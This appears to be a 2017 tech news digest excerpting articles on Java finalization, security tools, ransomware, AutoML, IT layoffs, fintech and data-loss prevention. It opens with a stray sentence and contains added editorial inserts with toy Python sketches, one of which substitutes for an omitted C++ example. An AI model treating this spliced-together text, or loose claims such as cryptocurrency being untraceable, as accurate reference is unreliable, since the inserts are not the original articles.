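Altering any earlier payload changes its recomputed hash and breaks every later link, which is what makes such a ledger a trustworthy record of device payment history.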


Under The Hood With the JVM's Automatic Resource Management

The finalize() mechanism is an attempt to provide automatic resource management, in a similar way to the RAII (Resource Acquisition Is Initialisation) pattern from C++ and similar languages. In that pattern, a destructor method (known as finalize() in Java) is provided, to enable automatic cleanup, and release of resources when the object is destroyed. The basic use case for this is fairly simple - when an object is created, it takes ownership of some resource, and the object’s ownership of that resource persists for the lifetime of the object. Then, when the object dies, the ownership of the resource is automatically relinquished. Let’s look at a quick simple C++ example that shows how to put an RAII wrapper around C-style file I/O. The core of this technique is that the object destructor method (denoted with a ~ at the start of a method named the same as the class) is used for cleanup:
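The C++ snippet the excerpt refers to is not reproduced here. As an illustration of the same RAII idea (a language swap for consistency with the other sketches, not the article's own example), Python's context-manager protocol plays the destructor's role: the resource is acquired in the constructor and released deterministically when the block exits, rather than at some unspecified finalization time.

```python
import os
import tempfile

class ManagedFile:
    """RAII-style wrapper: the resource is acquired on construction
    and released deterministically in __exit__, instead of relying
    on a finalizer run whenever the garbage collector gets around
    to it."""
    def __init__(self, path, mode="w"):
        self.handle = open(path, mode)   # acquisition is initialisation
    def __enter__(self):
        return self.handle
    def __exit__(self, exc_type, exc, tb):
        self.handle.close()              # cleanup runs even on exceptions
        return False                     # do not swallow exceptions

path = os.path.join(tempfile.gettempdir(), "raii_demo.txt")
with ManagedFile(path) as f:
    f.write("resource released when the block exits\n")
```

The key contrast with finalize() is determinism: cleanup happens at a known point in program flow, exactly as a C++ destructor fires when the owning object goes out of scope.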


10 Free or Low-Cost Security Tools

While free tools sound great, their usefulness varies from business to business. For some organizations, they are helpful means of solving small problems. For others, they are too "siloed" to be effective. "It depends on the environment," says Travis Farral, director of security strategy at Anomali, which is behind the Staxx free threat intelligence tool. "Some are against major deployment of anything open-source that doesn’t have a company behind it, for support or liability issues." Because many free and low-cost tools are designed for specific purposes, they often require advanced technical expertise. Several major businesses use a combination of major enterprise tools and FOSS utilities because they have the staff to support them. For organizations with fewer staff, siloed tools require security practitioners to become systems integrators, because they need to make the solutions work together, says Lee Weiner.



Quote for the day:


"Power concedes nothing without a demand. It never did and it never will." -- Frederick Douglass


Daily Tech Digest - May 20, 2017

Ransomware Rocks Endpoint Security Concerns

"The larger companies are strapped with so many layers of protection that it will take more time to figure out where AI fits in the stack, but mid-market to smaller enterprises with 150,000 to 200,000 nodes and below can adopt cutting-edge technology more quickly," McClure says. IDC's Westervelt notes that although many endpoint startups have launched out of the gate with signature-free detection technology that was based more on users' behavior, many are now adding signature-based detection engines to their products. "The vast majority of threats are known threats, so why put extra pressure on your sandbox" to test potentially malicious software based on its behavior, Westervelt says. And in the meantime, traditional signature-based anti-virus vendors have added signature-free security software to their offerings. As a result, Westervelt says, there is less and less differentiation between new and shiny startups and the old guard.


Google Researchers Are Teaching Their AI to Build Its Own, More Powerful AI

"The way it works is we take a set of candidate neural nets, think of these as little baby neural nets, and we actually use a neural net to iterate through them until we arrive at the best neural net," explains Pichai. That process is called reinforcement learning, where computers can link trial and error with some kind of reward, just like teaching a dog new tricks. It takes a massive amount of computational power to do, but Google's hardware is now getting to the stage where one neural net can analyse another. Neural nets usually take an expert team of scientists and engineers a significant amount of time to put together, but thanks to AutoML, almost anyone will be able to build AI systems to tackle whatever tasks they like. "We hope AutoML will take an ability that a few PhDs have today and will make it possible in three to five years for hundreds of thousands of developers to design new neural nets for their particular needs," Pichai writes in a blog post.
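The iterate-and-keep-the-best loop described above can be caricatured in a few lines (a toy random search with a made-up reward function; the real AutoML system trains a controller network with reinforcement learning rather than sampling blindly, so this only illustrates the candidate-score-select shape of the process).

```python
import random

random.seed(42)

def reward(config):
    """Hypothetical stand-in for validation accuracy: pretend that
    wider, four-layer-deep candidate networks score best."""
    return config["width"] * 0.01 - abs(config["depth"] - 4) * 0.1

# A population of "little baby neural nets", here just configurations
candidates = [{"width": random.randint(8, 256),
               "depth": random.randint(1, 10)} for _ in range(50)]

# Iterate through the candidates and keep the one with the best reward
best = max(candidates, key=reward)
print("best candidate:", best, "score:", round(reward(best), 3))
```

In the real system, the reward signal feeds back into the controller so that later candidates are sampled from more promising regions, which is what makes it reinforcement learning rather than plain random search.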


Indian IT's planned layoffs give a glimpse of the bloodbath ahead

It may not be the most original declaration, but sometimes detective work of this kind does have its advantages in exposing the rot that actually lurks beneath the sheets. Lakshmikanth's reading of the McKinsey report mirrors the alarms that many in the industry have been raising this year. The India CEO of the French IT services firm Capgemini said earlier this year: "I am not very pessimistic, but it is a challenging task and I tend to believe that 60-65 percent [of Indian IT workers] are just not trainable." "Probably, India will witness the largest unemployment in the middle level to senior level," he added. A more fundamental problem is the lack of real skills among most of India's engineering graduates. According to employment solutions company Aspiring Minds, a well-known institution that regularly tracks the worth of college graduates, a staggering 80 percent of engineers in India don't possess skills that can make them employable.


Currency is Under Attack. Diversifying Your Funds is Smarter Than Ever

You just never know what is going to happen next, so diversifying your currency can help manage your risk and increase your chances of survival should something go wrong. Plastic can be very secure for the consumer since there are protections against fraud, but it is costly for merchants in transaction fees and fraudulent charges. The downside is that all your money is in a bank where you can't get to it in a crisis and if the FDIC collapses you may have no recourse to get that money back. Cryptocurrency, like Bitcoin and Ethereum, doesn't rely on central banking, so there's a lot less chance they will open you up to identity theft. The problem is that if it is stolen, you can never get it back. Also because of its untraceable nature, it is often used in crimes.


Uber Freight Is the First Step to Automating Away Truckers

Much like the taxi service before it, Uber’s promise here is to remove friction from the current system. In a blog post announcing the new service, the firm bleats about how drivers will be able to pick up jobs with a simple search and some button presses, rather than spending “several hours and multiple phone calls” to achieve the same end, as in the past. ... But there is a larger narrative at play here. Uber’s move into shipping came after it acquired the autonomous truck company Otto last summer. And that sector is maturing quickly: while the trucks make use of similar technology to that being used by the autonomous cars being developed by Uber and Waymo for robotic taxi fleets, they also only have to contend with highways. That's far easier than inner-city driving.


Global banking technology overview

If banks don’t rise to the challenge, there are many FinTechs waiting to nibble away at their business. For instance, Caxton is a company that uses hybrid blockchain and core banking-type technology for foreign exchange (FX) end uses. Its CTO, Russell Stather, is convinced that smart contracts and DLT will disrupt the commercial banking environment serving corporate treasurers. “Smart contracts allow you to move an asset with multiparty involvement in a single transaction, which makes it cheaper, quicker and traceable end-to-end,” he says. The key benefit for a payment or trade finance end use is that not everyone in the chain is taking a transaction fee anymore, as blockchains – unlike correspondent banking ones – are fast, irrefutable and traceable. Settlement mechanisms and structures for investment banks could also easily be disrupted – or improved – by DLT.
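A minimal sketch of what "moving an asset with multiparty involvement in a single transaction" means (illustrative party names and balances, not Caxton's actual system): every leg of the settlement is validated first and then applied atomically, so no party is left holding a half-completed trade and no chain of intermediaries each takes a fee.

```python
# Toy balances for the parties in a trade-finance settlement
balances = {"importer": 100, "exporter": 0, "carrier": 5}

def atomic_transfer(legs):
    """legs: list of (payer, payee, amount). Apply all legs or none,
    the all-or-nothing property a smart contract provides on-chain."""
    debits = {}
    for payer, _, amount in legs:
        debits[payer] = debits.get(payer, 0) + amount
    if any(balances[p] < owed for p, owed in debits.items()):
        raise ValueError("insufficient funds; nothing applied")
    for payer, payee, amount in legs:
        balances[payer] -= amount
        balances[payee] += amount

# One settlement: the importer pays the exporter for goods and the
# carrier for freight in a single, traceable transaction
atomic_transfer([("importer", "exporter", 80), ("importer", "carrier", 10)])
print(balances)
```

On a real distributed ledger the same logic runs identically on every node, which is what makes the result irrefutable and traceable end-to-end without a correspondent bank in the middle.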


Protect your enterprise data using Windows Information Protection (WIP)

Unfortunately, data loss prevention systems have their own problems. For example, the more detailed the rule set, the more false positives are created, leading employees to believe that the rules slow down their work and need to be bypassed in order to remain productive, potentially leading to data being incorrectly blocked or improperly released. Another major problem is that data loss prevention systems must be widely implemented to be effective. For example, if your company uses a data loss prevention system for email, but not for file shares or document storage, you might find that your data leaks through the unprotected channels. But perhaps the biggest problem with data loss prevention systems is that they provide a jarring experience that interrupts employees’ natural workflow by stopping some operations while allowing others.


What will the ‘mega security breach’ of the future look like?

The mega breach of the future could take on a variety of different shapes and guises. Douglas Crawford, Cyber Security Expert at BestVPN.com, imagines what it might be like if a criminal got hold of a lot of banking passwords. “The economic chaos caused could, in addition to bankrupting potentially millions of individuals, destroy banks and banking systems, create global economic depression, and even bring down governments,” he says. The interesting thing about this situation is that it could arise from a variety of different motivations. Yet Chad Schamberger, Director of Engineering at VirtualArmour, believes that the mega breach of the future “will be driven to affect a decision, a political election, a financial outcome, or the intent to cause mass chaos across a population. Not necessarily to gather sellable assets, but intended to expose the attack surface that has developed by introducing more and more poorly developed connected devices (IoT).”


Supercomputing as a Service comes to the cloud with new Cray partnership

The first solution to come from the partnership will focus on the life sciences industry, and will feature the Cray Urika-GX system, a complete, pre-integrated hardware-software solution. It also includes the Cray Graph Engine, which includes pattern-matching that takes advantage of the scalable parallelization and performance of the platform, according to the release. "The Cray Urika-GX system is the first agile analytics platform that fuses supercomputing abilities with open enterprise standards to provide an unprecedented combination of versatility and speed for high-frequency insights, tailor-made for life sciences research and discovery," the press release stated. Cray and Markley plan to quickly expand their offerings to include Cray's full line of infrastructure solutions.


The Enterprise Architecture Problem

In IT (Information Technology), most of it is commodity. Buying these commodities may, at most, get you what everyone else already has. Forget analyzing performance improvement here; there is little of it, so emphasize cost reduction, enterprise-wide purchase agreements, and minimizing security vulnerability or TCO by restricting brands to those tested and approved. The real key lies in producing some enterprise IT that produces marked improvement in your business processes. If those are the same business processes everyone else uses, benchmarked against best practices elsewhere, you can buy it as a COTS (Commercial Off-The-Shelf) product and tweak it a bit. However, the best of all is the automation of processes that only you have, completely custom. You will have these special processes either because you do business differently (differentiation) or because only you are in this business.



Quote for the day:


"Mistakes should be examined, learned from, and discarded; not dwelled upon and stored." -- Tim Fargo